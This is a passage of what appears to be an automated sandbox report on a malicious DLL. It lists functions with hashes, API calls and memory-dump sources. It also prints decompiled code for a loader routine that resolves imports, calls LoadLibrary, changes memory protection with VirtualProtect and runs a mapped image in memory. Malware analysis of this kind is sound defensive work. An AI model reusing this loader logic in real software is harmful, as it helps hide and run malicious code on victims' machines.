                                • Opcode Fuzzy Hash: 869d7e88620df4a20aacd3864a2766800083b3dfd29d9961fd91121b05031e0b
                                • Instruction Fuzzy Hash: 8AE092313857126BE7217F2D4CC4F6BABACDF82334B124335F624D22D0CB948C4589A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD8DCDA, Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                Download Yara Rule
                                APIs
                                • __RTC_Initialize.LIBCMT ref: 6DD8DD27
                                  • Part of subcall function 6DD8E3BC: RtlInitializeSListHead.NTDLL(6DDCCB40), ref: 6DD8E3C1
                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6DD8DD91
                                • ___scrt_fastfail.LIBCMT ref: 6DD8DDDB
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                • String ID:
                                • API String ID: 2097537958-0
                                • Opcode ID: cd3b482e1b14621e454400892b01f3b6b2b754ca5d3ff009ff006de807fb3c98
                                • Instruction ID: 0f524860d0e4d469919bb5f30bdb7e0eb77190417202bce7bfb1ddfc05ba691a
                                • Opcode Fuzzy Hash: cd3b482e1b14621e454400892b01f3b6b2b754ca5d3ff009ff006de807fb3c98
                                • Instruction Fuzzy Hash: 9721CD7258C353EEDB137BB8D8007BC37A59F5226EF11845AF685A71C3CB2350448AB5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD4126D, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E6DD4126D(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6dd441cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}












                                0x6dd41277
                                0x6dd41284
                                0x6dd4128a
                                0x6dd41296
                                0x6dd412a6
                                0x6dd412a8
                                0x6dd412b0
                                0x6dd41345
                                0x6dd4134c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd412b6
                                0x6dd412b6
                                0x6dd412b6
                                0x6dd412ba
                                0x00000000
                                0x00000000
                                0x6dd412c6
                                0x6dd412ca
                                0x6dd412ee
                                0x6dd412f2
                                0x6dd41306
                                0x6dd41306
                                0x6dd4130c
                                0x6dd4131b
                                0x6dd4131f
                                0x6dd41327
                                0x6dd41327
                                0x6dd4132f
                                0x6dd41332
                                0x6dd4133f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd4133f
                                0x6dd412fa
                                0x6dd412fe
                                0x6dd41304
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd41304
                                0x6dd412d2
                                0x6dd412d6
                                0x6dd412e0
                                0x6dd412d8
                                0x6dd412d8
                                0x6dd412d8
                                0x00000000
                                0x6dd412d6
                                0x00000000

                                APIs
                                • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6DD412A6
                                • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6DD4131B
                                • GetLastError.KERNEL32 ref: 6DD41321
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: ProtectVirtual$ErrorLast
                                • String ID:
                                • API String ID: 1469625949-0
                                • Opcode ID: 84b3003e9b9ec21820b3dd17c766e10b15e4f69cf2adbd6a5356f4499051ccb1
                                • Instruction ID: 6c7f8dc76a3a8107bda9893b5a4c9c2aa34c55b03eab71174f8345d0cb457a6e
                                • Opcode Fuzzy Hash: 84b3003e9b9ec21820b3dd17c766e10b15e4f69cf2adbd6a5356f4499051ccb1
                                • Instruction Fuzzy Hash: 8A21837180160BDFCB14EF99C495EAAF7F9FF08319F008959E016D7585E3B8A6A4CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD414E8, Relevance: 4.6, APIs: 3, Instructions: 60stringthreadCOMMON
                                Download Yara Rule
                                C-Code - Quality: 80%
                                			E6DD414E8() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x6dd441c4);
				_push(1);
				_push( *0x6dd441d0 + 0x6dd45089);
				 *0x6dd441c0 = 0xc;
				 *0x6dd441c8 = 0; // executed
				L6DD41DA8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6DD41697( &_v44,  &_v28,  *0x6dd441cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x6dd441b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E6DD41144(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x6dd441b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E6DD42118(_t40, _t30 + 4);
					}
				}
				_t23 = E6DD41444(_v44); // executed
				goto L7;
			}













                                0x6dd414fa
                                0x6dd414fb
                                0x6dd41500
                                0x6dd41508
                                0x6dd41509
                                0x6dd41513
                                0x6dd41519
                                0x6dd41522
                                0x6dd41527
                                0x6dd41545
                                0x6dd4159a
                                0x6dd4159b
                                0x6dd4159c
                                0x6dd4159c
                                0x6dd4154d
                                0x6dd41553
                                0x6dd41561
                                0x6dd41565
                                0x6dd4156c
                                0x6dd41574
                                0x6dd41578
                                0x6dd4157a
                                0x6dd41589
                                0x6dd4157c
                                0x6dd41582
                                0x6dd41582
                                0x6dd4157a
                                0x6dd41591
                                0x00000000

                                APIs
                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6DD441C4,00000000), ref: 6DD41519
                                • lstrlenW.KERNEL32(?,?,?), ref: 6DD4154D
                                  • Part of subcall function 6DD41144: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A,?,?), ref: 6DD41151
                                  • Part of subcall function 6DD41144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6DD41167
                                  • Part of subcall function 6DD41144: _snwprintf.NTDLL ref: 6DD4118C
                                  • Part of subcall function 6DD41144: CreateFileMappingW.KERNELBASE(000000FF,6DD441C0,00000004,00000000,?,?), ref: 6DD411B1
                                  • Part of subcall function 6DD41144: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A,?), ref: 6DD411C8
                                  • Part of subcall function 6DD41144: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A), ref: 6DD411FD
                                • ExitThread.KERNEL32 ref: 6DD4159C
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                • String ID:
                                • API String ID: 4209869662-0
                                • Opcode ID: 50ce143ccd851a73fbac6c3b3d0cf522b6d5f21c12d461aced705e1eabeef9ef
                                • Instruction ID: ac028e655801ec36a03b35da7946a0b8682c7e765c4e225920c6606807288298
                                • Opcode Fuzzy Hash: 50ce143ccd851a73fbac6c3b3d0cf522b6d5f21c12d461aced705e1eabeef9ef
                                • Instruction Fuzzy Hash: B6119D72558205AFEB11FF64C844FAB7BFCBB49708F018A16F259D7140DB70E5948BA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD41ADB, Relevance: 2.5, APIs: 2, Instructions: 48memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 84%
                                			E6DD41ADB(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6DD41697( &_v8,  &_v12,  *0x6dd441cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6DD42087(_t22, _v8,  *0x6dd441cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E6DD41E8A(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6dd44190, 0, _v8);
				}
				return _t25;
			}









                                0x6dd41adb
                                0x6dd41ade
                                0x6dd41adf
                                0x6dd41af5
                                0x6dd41afe
                                0x6dd41b03
                                0x6dd41b1c
                                0x6dd41b05
                                0x6dd41b18
                                0x6dd41b18
                                0x6dd41b20
                                0x6dd41b22
                                0x6dd41b2a
                                0x6dd41b32
                                0x6dd41b3a
                                0x6dd41b3c
                                0x6dd41b3c
                                0x6dd41b3a
                                0x6dd41b4c
                                0x6dd41b4c
                                0x6dd41b57

                                APIs
                                • StrStrIA.KERNELBASE(00000000,6DD41CE6,?,6DD41CE6,?,00000000,00000000,?,?,?,6DD41CE6), ref: 6DD41B32
                                • HeapFree.KERNEL32(00000000,?,?,6DD41CE6,?,00000000,00000000,?,?,?,6DD41CE6), ref: 6DD41B4C
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 74a8af9c2875d4d000de1a0f8862a56ce0617ff5c74a7692eb2f4063eeacfd44
                                • Instruction ID: b3746777ec6cb7f25307bb648129e8c6b3348bd835dc042929bff2c60389032b
                                • Opcode Fuzzy Hash: 74a8af9c2875d4d000de1a0f8862a56ce0617ff5c74a7692eb2f4063eeacfd44
                                • Instruction Fuzzy Hash: 5D014476A10115EBDB01BFA5CD00FAF7BBDEB4A644F118161FA40E3144EB31EA519AB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD8C640, Relevance: 1.8, APIs: 1, Instructions: 343COMMON
                                Download Yara Rule
                                APIs
                                • GetTempPathA.KERNELBASE(000008DA,?), ref: 6DD8C6F8
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: PathTemp
                                • String ID:
                                • API String ID: 2920410445-0
                                • Opcode ID: 621ed5509de4f391c6921c8e15da5235dc3955509ea46d62b37a9bd78f99e8c6
                                • Instruction ID: f4e07afb476ba073acddb2ce3b3eda7317a7ac56ce0e0d98b3741bd47d5083d0
                                • Opcode Fuzzy Hash: 621ed5509de4f391c6921c8e15da5235dc3955509ea46d62b37a9bd78f99e8c6
                                • Instruction Fuzzy Hash: E9D19FB2905116CFEB05EF7DC8807AD7BB9FB8A310F164229E415A73C6EB349805CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDAD792, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,6DDCB004,00000000), ref: 6DDAD7D3
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: e348db4839fbcfc914ad249992d3f4943cce7d9fe7ff42414fec8cfa0e52da66
                                • Instruction ID: 0dfaf6b211baca78174b89e6ca9e0231bec886102d52e81e93fde61204dcccf7
                                • Opcode Fuzzy Hash: e348db4839fbcfc914ad249992d3f4943cce7d9fe7ff42414fec8cfa0e52da66
                                • Instruction Fuzzy Hash: DCF0BB32544525ABEB197B25CC04F5B7758AFC2760F09C011FD5696584EB30D90246F0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDB0101, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6DDB0133
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 66b8d34aa9532709a0f17f37a1c934dad9a4b8f540400b31e4b453cf88a3b034
                                • Instruction ID: 2650352de37d323626d197133a38fa154d8bd3ccc36156875fcedc5159912f6b
                                • Opcode Fuzzy Hash: 66b8d34aa9532709a0f17f37a1c934dad9a4b8f540400b31e4b453cf88a3b034
                                • Instruction Fuzzy Hash: 0FE0A061549612A7E7193B6A8D00FBB765CAF437E8F015050FD5AD6089EB70D80085B4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD41444, Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                Download Yara Rule
                                C-Code - Quality: 86%
                                			E6DD41444(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6dd441cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6dd441cc - 0x63698bc4 &  !( *0x6dd441cc - 0x63698bc4);
				_t18 = E6DD41060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6dd441cc - 0x63698bc4 &  !( *0x6dd441cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6dd441cc - 0x63698bc4 &  !( *0x6dd441cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6DD41A5A(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6DD41F7C(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6DD4126D(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6DD4142F(_t42);
					L8:
					return _t29;
				}
			}














                                0x6dd4144c
                                0x6dd4144e
                                0x6dd4146a
                                0x6dd4147b
                                0x6dd41482
                                0x6dd414e0
                                0x00000000
                                0x6dd41484
                                0x6dd41484
                                0x6dd4148e
                                0x6dd41492
                                0x6dd41497
                                0x6dd4149a
                                0x6dd4149f
                                0x6dd414a3
                                0x6dd414a8
                                0x6dd414ad
                                0x6dd414b1
                                0x6dd414b6
                                0x6dd414b7
                                0x6dd414bb
                                0x6dd414c0
                                0x6dd414c8
                                0x6dd414c8
                                0x6dd414c0
                                0x6dd414b1
                                0x6dd414a3
                                0x6dd414ca
                                0x6dd414d3
                                0x6dd414d7
                                0x6dd414e1
                                0x6dd414e7
                                0x6dd414e7

                                APIs
                                  • Part of subcall function 6DD41060: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6DD41480,?,?,?,?,00000002,00000000,?,?), ref: 6DD41084
                                  • Part of subcall function 6DD41060: GetProcAddress.KERNEL32(00000000,?), ref: 6DD410A6
                                  • Part of subcall function 6DD41060: GetProcAddress.KERNEL32(00000000,?), ref: 6DD410BC
                                  • Part of subcall function 6DD41060: GetProcAddress.KERNEL32(00000000,?), ref: 6DD410D2
                                  • Part of subcall function 6DD41060: GetProcAddress.KERNEL32(00000000,?), ref: 6DD410E8
                                  • Part of subcall function 6DD41060: GetProcAddress.KERNEL32(00000000,?), ref: 6DD410FE
                                  • Part of subcall function 6DD41A5A: memcpy.NTDLL(00000000,00000002,6DD4148E,?,?,?,?,?,6DD4148E,?,?,?,?,?,?,00000002), ref: 6DD41A87
                                  • Part of subcall function 6DD41A5A: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6DD41ABA
                                  • Part of subcall function 6DD41F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6DD41FB4
                                  • Part of subcall function 6DD4126D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6DD412A6
                                  • Part of subcall function 6DD4126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6DD4131B
                                  • Part of subcall function 6DD4126D: GetLastError.KERNEL32 ref: 6DD41321
                                • GetLastError.KERNEL32(?,?), ref: 6DD414C2
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                • String ID:
                                • API String ID: 2673762927-0
                                • Opcode ID: d2622eb23e1f98813127c703ba14ad404fb7f8ef932f30228e141f9320f3d06e
                                • Instruction ID: 74b1e8fc2fa3a6ee746706bb5c280f9533c1dfa8bf37a4b0ea2fe9f0083955bb
                                • Opcode Fuzzy Hash: d2622eb23e1f98813127c703ba14ad404fb7f8ef932f30228e141f9320f3d06e
                                • Instruction Fuzzy Hash: 7A112B76704716ABD721BBE98C80DAB77BCBF48204B05C158FA4997145FBA0ED1687B0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 6DD91727, Relevance: 58.9, APIs: 32, Strings: 1, Instructions: 1115COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name::operator+$operator+
                                • String ID: /
                                • API String ID: 1595903985-2043925204
                                • Opcode ID: 183bdda7f236a32f80742143e39b796ce77210b687659eef335bb3ec3d7c3dcc
                                • Instruction ID: 9a6fec81cee74751c58b1d6e96051cb6ffb0c4ac5742bf0b46efbb434a80c78a
                                • Opcode Fuzzy Hash: 183bdda7f236a32f80742143e39b796ce77210b687659eef335bb3ec3d7c3dcc
                                • Instruction Fuzzy Hash: E6825376D1420ADBDF15EFE8C890BEEB7B9BB08354F11812AF515EB280DB359944CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD41F10, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E6DD41F10() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6dd441b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6dd441bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6dd441ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6dd441a8 = _t5;
					 *0x6dd441b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6dd441a4 = _t6;
					if(_t6 == 0) {
						 *0x6dd441a4 =  *0x6dd441a4 | 0xffffffff;
					}
					return 0;
				}
			}









                                0x6dd41f11
                                0x6dd41f1f
                                0x6dd41f27
                                0x6dd41f2c
                                0x6dd41f76
                                0x6dd41f76
                                0x6dd41f2e
                                0x6dd41f36
                                0x6dd41f72
                                0x6dd41f74
                                0x6dd41f38
                                0x6dd41f38
                                0x6dd41f3d
                                0x6dd41f4b
                                0x6dd41f50
                                0x6dd41f56
                                0x6dd41f5e
                                0x6dd41f63
                                0x6dd41f65
                                0x6dd41f65
                                0x6dd41f6f
                                0x6dd41f6f

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6DD41C8E,751463F0,00000000), ref: 6DD41F1F
                                • GetVersion.KERNEL32 ref: 6DD41F2E
                                • GetCurrentProcessId.KERNEL32 ref: 6DD41F3D
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6DD41F56
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: Process$CreateCurrentEventOpenVersion
                                • String ID:
                                • API String ID: 845504543-0
                                • Opcode ID: ad1d5ca1a80d96a25d720f32b78de4f20eeaecd53cc2ca4603b5bec1a52f17ca
                                • Instruction ID: 24b5ba26f16927f20996547cc0d5b33b28afa0104ff3f2833c8f4c2adfda86d6
                                • Opcode Fuzzy Hash: ad1d5ca1a80d96a25d720f32b78de4f20eeaecd53cc2ca4603b5bec1a52f17ca
                                • Instruction Fuzzy Hash: 10F017716C5250AFFF50BF68A8097953BB4BB1A751F14421AF265D91C0E7B084C28B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDB1C7E, Relevance: 4.7, APIs: 3, Instructions: 171timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6DD44D40), ref: 6DDB1CE8
                                • _free.LIBCMT ref: 6DDB1CD6
                                  • Part of subcall function 6DDAD7F5: HeapFree.KERNEL32(00000000,00000000,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?), ref: 6DDAD80B
                                  • Part of subcall function 6DDAD7F5: GetLastError.KERNEL32(?,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?,?), ref: 6DDAD81D
                                • _free.LIBCMT ref: 6DDB1EA2
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 2155170405-0
                                • Opcode ID: 5d7e4b68ba5055ace9a3d21ec148c9cf8bf9b04432795710c2f1071d6cdb4346
                                • Instruction ID: b103db824af9df898bc59f4516b0de3561c67b078256806c36cae7a3ada78dae
                                • Opcode Fuzzy Hash: 5d7e4b68ba5055ace9a3d21ec148c9cf8bf9b04432795710c2f1071d6cdb4346
                                • Instruction Fuzzy Hash: 9351C9B1D4421AEBDB10FF78CC40AAA77BCAF86358F11426AF561D7181EB309945CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDA18EF, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                Download Yara Rule
                                APIs
                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,7FFFFFFF), ref: 6DDA19E7
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,7FFFFFFF), ref: 6DDA19F1
                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,7FFFFFFF), ref: 6DDA19FE
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: 1f8af9bd562610fa9673ac9cdbf48bc52795fbf7fc30ca9f9a42a4aff91494d5
                                • Instruction ID: 1d24ced798f60500cb6e689d1e6959de1a9fcf5a3ccb6fecb32a711dc06181ee
                                • Opcode Fuzzy Hash: 1f8af9bd562610fa9673ac9cdbf48bc52795fbf7fc30ca9f9a42a4aff91494d5
                                • Instruction Fuzzy Hash: 7F31D47590122DABCB21EF24D9887DDBBB8BF48310F5081EAE51CA7291E7709B858F54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDA2120, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(?,?,6DDA211F,?,?,?,?), ref: 6DDA2142
                                • TerminateProcess.KERNEL32(00000000,?,6DDA211F,?,?,?,?), ref: 6DDA2149
                                • ExitProcess.KERNEL32 ref: 6DDA215B
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: 8df1c309dac1676440e095896d54675fe1b9854f6b8b916f61253f1eeaf65002
                                • Instruction ID: 16dc536badb60be96c1900e372e614916bc2c8bd9ff3716bddf579e5d9507d46
                                • Opcode Fuzzy Hash: 8df1c309dac1676440e095896d54675fe1b9854f6b8b916f61253f1eeaf65002
                                • Instruction Fuzzy Hash: 3DE0EC71108188EFCF357F66CD48A6E3FB9EB52649B054414FB498623ACB35ED82CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DDA0534, Relevance: 4.0, APIs: 2, Instructions: 950COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: b8dc42268dfedf98d12094be3bf27d9cf0ca32c3e870895538069a9728e22642
                                • Instruction ID: a205ca2d41949613d490011b70c46d618cce2a20facda820c32ab4656900a0f9
                                • Opcode Fuzzy Hash: b8dc42268dfedf98d12094be3bf27d9cf0ca32c3e870895538069a9728e22642
                                • Instruction Fuzzy Hash: 7C720574E0020ADFCB14DFA9C990ABEB7B5EF44348F19856DED4597349D732AA02CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD9D6B0, Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0fdf9d6de8286cd2b1aec4dbdbf1c33c30447d3a0964aa105c041d8c19639164
